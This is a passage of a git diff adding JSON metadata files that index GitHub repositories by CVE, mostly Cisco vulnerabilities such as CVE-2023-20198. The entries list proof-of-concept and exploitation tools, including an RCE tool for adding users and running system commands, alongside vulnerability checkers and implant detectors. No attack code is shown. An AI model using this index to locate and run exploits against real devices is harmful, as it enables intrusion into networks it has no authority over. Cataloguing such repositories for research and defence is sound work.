"watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20048.json b/2023/CVE-2023-20048.json new file mode 100644 index 0000000000..656b6d56d3 --- /dev/null +++ b/2023/CVE-2023-20048.json @@ -0,0 +1,37 @@ +[ + { + "id": 771806530, + "name": "FuegoTest", + "full_name": "0zer0d4y\/FuegoTest", + "owner": { + "login": "0zer0d4y", + "id": 163229114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163229114?v=4", + "html_url": "https:\/\/github.com\/0zer0d4y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0zer0d4y\/FuegoTest", + "description": "A CLI tool for detecting CVE-2023-20048 vulnerability in Cisco Firepower Management Center.", + "fork": false, + "created_at": "2024-03-14T01:32:41Z", + "updated_at": "2024-03-14T02:00:34Z", + "pushed_at": "2024-03-14T01:59:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cisco-firepower-management-center", + "cve-2023-20048", + "security-tools" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20052.json b/2023/CVE-2023-20052.json new file mode 100644 index 0000000000..81f366f76e --- /dev/null +++ b/2023/CVE-2023-20052.json @@ -0,0 +1,64 @@ +[ + { + "id": 637940882, + "name": "CVE-2023-20052", + "full_name": "nokn0wthing\/CVE-2023-20052", + "owner": { + "login": "nokn0wthing", + "id": 53658504, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53658504?v=4", + "html_url": "https:\/\/github.com\/nokn0wthing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nokn0wthing\/CVE-2023-20052", + "description": "CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV", + "fork": false, + "created_at": "2023-05-08T18:34:02Z", + "updated_at": "2024-08-12T20:31:15Z", + "pushed_at": "2023-05-08T18:42:52Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 27, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 668173510, + "name": "CVE-2023-20052", + "full_name": "cY83rR0H1t\/CVE-2023-20052", + "owner": { + "login": "cY83rR0H1t", + "id": 48300212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48300212?v=4", + "html_url": "https:\/\/github.com\/cY83rR0H1t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cY83rR0H1t\/CVE-2023-20052", + "description": "CVE-2023-20052 information leak vulnerability in the DMG file parser of ClamAV", + "fork": false, + "created_at": "2023-07-19T07:39:20Z", + "updated_at": "2023-09-10T09:29:38Z", + "pushed_at": "2023-09-10T09:56:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20073.json b/2023/CVE-2023-20073.json new file mode 100644 index 0000000000..a517781c70 --- /dev/null +++ b/2023/CVE-2023-20073.json @@ -0,0 +1,33 @@ +[ + { + "id": 679959255, + "name": "CVE-2023-20073", + "full_name": "RegularITCat\/CVE-2023-20073", + "owner": { + "login": "RegularITCat", + "id": 30820879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30820879?v=4", + "html_url": "https:\/\/github.com\/RegularITCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RegularITCat\/CVE-2023-20073", + "description": "PoC based on https:\/\/unsafe[.]sh\/go-173464.html research", + "fork": false, + "created_at": "2023-08-18T02:42:50Z", + "updated_at": "2023-08-19T21:11:24Z", + "pushed_at": "2023-08-18T04:00:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2008.json b/2023/CVE-2023-2008.json new file mode 100644 index 0000000000..19caa52511 --- /dev/null +++ b/2023/CVE-2023-2008.json @@ -0,0 +1,33 @@ +[ + { + "id": 652665640, + "name": "CVE-2023-2008", + "full_name": "bluefrostsecurity\/CVE-2023-2008", + "owner": { + "login": "bluefrostsecurity", + "id": 4976074, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4976074?v=4", + "html_url": "https:\/\/github.com\/bluefrostsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bluefrostsecurity\/CVE-2023-2008", + "description": "Proof of concept code for CVE-2023-2008", + "fork": false, + "created_at": "2023-06-12T14:41:53Z", + "updated_at": "2024-11-30T08:01:29Z", + "pushed_at": "2023-06-12T15:04:02Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 36, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20110.json b/2023/CVE-2023-20110.json new file mode 100644 index 0000000000..b983dbefcb --- /dev/null +++ b/2023/CVE-2023-20110.json @@ -0,0 +1,33 @@ +[ + { + "id": 667012414, + "name": "CVE-2023-20110", + "full_name": "redfr0g\/CVE-2023-20110", + "owner": { + "login": "redfr0g", + "id": 26508085, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26508085?v=4", + "html_url": "https:\/\/github.com\/redfr0g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redfr0g\/CVE-2023-20110", + "description": "PoC script for CVE-2023-20110 - Cisco Smart Software Manager On-Prem SQL Injection Vulnerability", + "fork": false, + "created_at": "2023-07-16T10:53:51Z", + "updated_at": "2024-04-20T01:38:50Z", + "pushed_at": "2023-07-16T11:11:33Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20126.json b/2023/CVE-2023-20126.json new file mode 100644 index 0000000000..889b46a9d6 --- /dev/null +++ b/2023/CVE-2023-20126.json @@ -0,0 +1,33 @@ +[ + { + "id": 641832121, + "name": "RancidCrisco", + "full_name": "fullspectrumdev\/RancidCrisco", + "owner": { + "login": "fullspectrumdev", + "id": 132891614, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132891614?v=4", + "html_url": "https:\/\/github.com\/fullspectrumdev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fullspectrumdev\/RancidCrisco", + "description": "PoC for CVE-2023-20126", + "fork": false, + "created_at": "2023-05-17T08:59:40Z", + "updated_at": "2025-01-07T03:24:58Z", + "pushed_at": "2023-06-20T12:45:45Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20178.json b/2023/CVE-2023-20178.json new file mode 100644 index 0000000000..21b6327870 --- /dev/null +++ b/2023/CVE-2023-20178.json @@ -0,0 +1,33 @@ +[ + { + "id": 655275412, + "name": "CVE-2023-20178", + "full_name": "Wh04m1001\/CVE-2023-20178", + "owner": { + "login": "Wh04m1001", + "id": 44291883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291883?v=4", + "html_url": "https:\/\/github.com\/Wh04m1001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wh04m1001\/CVE-2023-20178", + "description": null, + "fork": false, + "created_at": "2023-06-18T12:22:57Z", + "updated_at": "2024-11-21T06:13:18Z", + "pushed_at": "2023-06-18T12:41:52Z", + "stargazers_count": 92, + "watchers_count": 92, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 92, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20198.json b/2023/CVE-2023-20198.json new file mode 100644 index 0000000000..29390b881c --- /dev/null +++ b/2023/CVE-2023-20198.json @@ -0,0 +1,817 @@ +[ + { + "id": 706041284, + "name": "CVE-2023-20198-checker", + "full_name": "raystr-atearedteam\/CVE-2023-20198-checker", + "owner": { + "login": "raystr-atearedteam", + "id": 143163794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143163794?v=4", + "html_url": "https:\/\/github.com\/raystr-atearedteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raystr-atearedteam\/CVE-2023-20198-checker", + "description": null, + "fork": false, + "created_at": "2023-10-17T07:35:50Z", + "updated_at": "2023-10-17T07:36:19Z", + "pushed_at": "2023-10-17T07:52:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 706050725, + "name": "CVE-2023-20198", + "full_name": "Atea-Redteam\/CVE-2023-20198", + "owner": { + "login": "Atea-Redteam", + "id": 108491572, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108491572?v=4", + "html_url": "https:\/\/github.com\/Atea-Redteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Atea-Redteam\/CVE-2023-20198", + "description": "CVE-2023-20198 Checkscript", + "fork": false, + "created_at": "2023-10-17T08:00:18Z", + "updated_at": "2024-04-01T11:30:40Z", + "pushed_at": "2023-10-23T20:19:49Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 17, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 706260017, + "name": "cisco-CVE-2023-20198-tester", + "full_name": "securityphoenix\/cisco-CVE-2023-20198-tester", + "owner": { + "login": "securityphoenix", + "id": 61992902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61992902?v=4", + "html_url": "https:\/\/github.com\/securityphoenix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securityphoenix\/cisco-CVE-2023-20198-tester", + "description": "cisco-CVE-2023-20198-tester ", + "fork": false, + "created_at": "2023-10-17T15:44:01Z", + "updated_at": "2023-10-19T10:01:05Z", + "pushed_at": "2023-10-20T14:43:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 706337485, + "name": "Simple-Ansible-for-CVE-2023-20198", + "full_name": "emomeni\/Simple-Ansible-for-CVE-2023-20198", + "owner": { + "login": "emomeni", + "id": 6424128, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6424128?v=4", + "html_url": "https:\/\/github.com\/emomeni", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emomeni\/Simple-Ansible-for-CVE-2023-20198", + "description": null, + "fork": false, + "created_at": "2023-10-17T18:46:21Z", + "updated_at": "2024-12-11T17:41:30Z", + "pushed_at": "2023-10-17T18:46:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 706412262, + "name": "CVE-2023-20198-Checker", + "full_name": "ZephrFish\/CVE-2023-20198-Checker", + "owner": { + "login": "ZephrFish", + "id": 5783068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4", + "html_url": "https:\/\/github.com\/ZephrFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZephrFish\/CVE-2023-20198-Checker", + "description": "CVE-2023-20198 & 0Day Implant Scanner", + "fork": false, + "created_at": "2023-10-17T22:41:14Z", + "updated_at": "2024-11-06T11:13:05Z", + "pushed_at": "2023-10-23T00:19:21Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 31, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 706567964, + "name": "CVE-2023-20198", + "full_name": "JoyGhoshs\/CVE-2023-20198", + "owner": { + "login": "JoyGhoshs", + "id": 36255129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36255129?v=4", + "html_url": "https:\/\/github.com\/JoyGhoshs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JoyGhoshs\/CVE-2023-20198", + "description": "Checker for CVE-2023-20198 , Not a full POC Just checks the implementation and detects if hex is in response or not", + "fork": false, + "created_at": "2023-10-18T07:53:29Z", + "updated_at": "2023-10-18T07:58:31Z", + "pushed_at": "2023-10-18T07:58:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 706591699, + "name": "CVE-2023-20198", + "full_name": "Tounsi007\/CVE-2023-20198", + "owner": { + "login": "Tounsi007", + "id": 50546276, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50546276?v=4", + "html_url": "https:\/\/github.com\/Tounsi007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tounsi007\/CVE-2023-20198", + "description": "CVE-2023-20198 PoC (!)", + "fork": false, + "created_at": "2023-10-18T08:50:49Z", + "updated_at": "2023-10-26T02:37:03Z", + "pushed_at": "2023-10-17T14:02:51Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 9, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 706759894, + "name": "CVE_2023_20198_Detector", + "full_name": "alekos3\/CVE_2023_20198_Detector", + "owner": { + "login": "alekos3", + "id": 79263622, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79263622?v=4", + "html_url": "https:\/\/github.com\/alekos3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alekos3\/CVE_2023_20198_Detector", + "description": "This script can identify if Cisco IOS XE devices are vulnerable to CVE-2023-20198", + "fork": false, + "created_at": "2023-10-18T15:04:57Z", + "updated_at": "2023-10-24T20:08:54Z", + "pushed_at": "2023-10-31T01:53:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707531165, + "name": "Cisco_CVE-2023-20198", + "full_name": "reket99\/Cisco_CVE-2023-20198", + "owner": { + "login": "reket99", + "id": 42685719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42685719?v=4", + "html_url": "https:\/\/github.com\/reket99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reket99\/Cisco_CVE-2023-20198", + "description": null, + "fork": false, + "created_at": "2023-10-20T05:28:40Z", + "updated_at": "2023-10-20T09:13:11Z", + "pushed_at": "2023-10-19T13:44:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 707768225, + "name": "cve-2023-20198", + "full_name": "iveresk\/cve-2023-20198", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + "html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/cve-2023-20198", + "description": "1vere$k POC on the CVE-2023-20198", + "fork": false, + "created_at": "2023-10-20T16:01:17Z", + "updated_at": "2023-12-06T03:03:43Z", + "pushed_at": "2023-10-20T21:51:52Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707899105, + "name": "CVE-2023-20198", + "full_name": "sohaibeb\/CVE-2023-20198", + "owner": { + "login": "sohaibeb", + "id": 25540162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25540162?v=4", + "html_url": "https:\/\/github.com\/sohaibeb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sohaibeb\/CVE-2023-20198", + "description": "CISCO CVE POC SCRIPT", + "fork": false, + "created_at": "2023-10-20T23:34:12Z", + "updated_at": "2024-08-12T20:32:54Z", + "pushed_at": "2023-10-21T00:31:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 708870245, + "name": "cisco-ios-xe-implant-detection", + "full_name": "fox-it\/cisco-ios-xe-implant-detection", + "owner": { + "login": "fox-it", + "id": 468621, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/468621?v=4", + "html_url": "https:\/\/github.com\/fox-it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fox-it\/cisco-ios-xe-implant-detection", + "description": "Cisco IOS XE implant scanning & detection (CVE-2023-20198, CVE-2023-20273)", + "fork": false, + "created_at": "2023-10-23T14:52:18Z", + "updated_at": "2024-12-09T01:45:19Z", + "pushed_at": "2023-11-07T12:21:26Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "badcandy", + "cisco", + "cisco-ios-xe", + "cve-2023-20198", + "cve-2023-20273", + "iocisco", + "pcap", + "suricata" + ], + "visibility": "public", + "forks": 9, + "watchers": 37, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 708903459, + "name": "CVE-2023-20198", + "full_name": "Pushkarup\/CVE-2023-20198", + "owner": { + "login": "Pushkarup", + "id": 148672587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148672587?v=4", + "html_url": "https:\/\/github.com\/Pushkarup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pushkarup\/CVE-2023-20198", + "description": "A PoC for CVE 2023-20198", + "fork": false, + "created_at": "2023-10-23T16:04:23Z", + "updated_at": "2024-02-12T20:11:46Z", + "pushed_at": "2023-10-23T19:10:41Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 708983573, + "name": "CVE-2023-20198-Scanner", + "full_name": "Shadow0ps\/CVE-2023-20198-Scanner", + "owner": { + "login": "Shadow0ps", + "id": 6516174, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6516174?v=4", + "html_url": "https:\/\/github.com\/Shadow0ps", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shadow0ps\/CVE-2023-20198-Scanner", + "description": "This is a webshell fingerprinting scanner designed to identify implants on Cisco IOS XE WebUI's affected by CVE-2023-20198 and CVE-2023-20273", + "fork": false, + "created_at": "2023-10-23T19:25:29Z", + "updated_at": "2024-12-19T11:35:17Z", + "pushed_at": "2023-10-24T18:17:43Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": true, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 31, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 709227946, + "name": "CVE-2023-20198", + "full_name": "kacem-expereo\/CVE-2023-20198", + "owner": { + "login": "kacem-expereo", + "id": 115718278, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115718278?v=4", + "html_url": "https:\/\/github.com\/kacem-expereo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kacem-expereo\/CVE-2023-20198", + "description": "Check a target IP for CVE-2023-20198", + "fork": false, + "created_at": "2023-10-24T09:36:37Z", + "updated_at": "2023-10-26T09:12:20Z", + "pushed_at": "2023-10-24T09:42:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 709677069, + "name": "CVE-2023-20198-IOS-XE-Scanner", + "full_name": "mr-r3b00t\/CVE-2023-20198-IOS-XE-Scanner", + "owner": { + "login": "mr-r3b00t", + "id": 14963690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14963690?v=4", + "html_url": "https:\/\/github.com\/mr-r3b00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-r3b00t\/CVE-2023-20198-IOS-XE-Scanner", + "description": null, + "fork": false, + "created_at": "2023-10-25T07:13:59Z", + "updated_at": "2023-10-25T12:20:24Z", + "pushed_at": "2023-10-25T11:40:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 710019547, + "name": "CVE-2023-20198", + "full_name": "ohlawd\/CVE-2023-20198", + "owner": { + "login": "ohlawd", + "id": 55877722, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55877722?v=4", + "html_url": "https:\/\/github.com\/ohlawd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ohlawd\/CVE-2023-20198", + "description": null, + "fork": false, + "created_at": "2023-10-25T21:02:22Z", + "updated_at": "2023-10-25T21:03:27Z", + "pushed_at": "2023-10-25T21:03:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 710023699, + "name": "CVE-2023-20198", + "full_name": "IceBreakerCode\/CVE-2023-20198", + "owner": { + "login": "IceBreakerCode", + "id": 129914557, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129914557?v=4", + "html_url": "https:\/\/github.com\/IceBreakerCode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IceBreakerCode\/CVE-2023-20198", + "description": null, + "fork": false, + "created_at": "2023-10-25T21:15:58Z", + "updated_at": "2023-10-25T21:40:42Z", + "pushed_at": "2023-10-25T21:20:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 713890378, + "name": "CVE-2023-20198", + "full_name": "RevoltSecurities\/CVE-2023-20198", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2023-20198", + "description": "An Exploitation script developed to exploit the CVE-2023-20198 Cisco zero day vulnerability on their IOS routers ", + "fork": false, + "created_at": "2023-11-03T13:05:59Z", + "updated_at": "2024-11-26T16:58:31Z", + "pushed_at": "2023-11-03T13:54:43Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 719665038, + "name": "CVE-2023-20198", + "full_name": "smokeintheshell\/CVE-2023-20198", + "owner": { + "login": "smokeintheshell", + "id": 19311214, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19311214?v=4", + "html_url": "https:\/\/github.com\/smokeintheshell", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/smokeintheshell\/CVE-2023-20198", + "description": "CVE-2023-20198 Exploit PoC", + "fork": false, + "created_at": "2023-11-16T16:39:38Z", + "updated_at": "2024-12-23T08:10:07Z", + "pushed_at": "2023-12-07T22:34:43Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 41, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 729302860, + "name": "CVE-2023-20198-Fix", + "full_name": "netbell\/CVE-2023-20198-Fix", + "owner": { + "login": "netbell", + "id": 47117028, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47117028?v=4", + "html_url": "https:\/\/github.com\/netbell", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/netbell\/CVE-2023-20198-Fix", + "description": "Check for and remediate conditions that make an IOS-XE device vulnerable to CVE-2023-20198", + "fork": false, + "created_at": "2023-12-08T21:12:00Z", + "updated_at": "2023-12-08T21:12:00Z", + "pushed_at": "2023-12-09T17:03:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 730163821, + "name": "Cisco_CVE-2023-20198", + "full_name": "Vulnmachines\/Cisco_CVE-2023-20198", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Cisco_CVE-2023-20198", + "description": "Cisco CVE-2023-20198", + "fork": false, + "created_at": "2023-12-11T10:41:48Z", + "updated_at": "2023-12-11T18:45:44Z", + "pushed_at": "2023-12-11T10:44:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 791680827, + "name": "CVE-2023-20198-RCE", + "full_name": "W01fh4cker\/CVE-2023-20198-RCE", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2023-20198-RCE", + "description": "CVE-2023-20198-RCE, support adding\/deleting users and executing cli commands\/system commands.", + "fork": false, + "created_at": "2024-04-25T06:59:53Z", + "updated_at": "2024-07-15T13:33:36Z", + "pushed_at": "2024-04-25T07:32:57Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 37, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 847623387, + "name": "CVE-2023-20198", + "full_name": "sanan2004\/CVE-2023-20198", + "owner": { + "login": "sanan2004", + "id": 118365296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118365296?v=4", + "html_url": "https:\/\/github.com\/sanan2004", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sanan2004\/CVE-2023-20198", + "description": null, + "fork": false, + "created_at": "2024-08-26T08:16:28Z", + "updated_at": "2024-08-26T08:31:22Z", + "pushed_at": "2024-08-26T08:31:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + 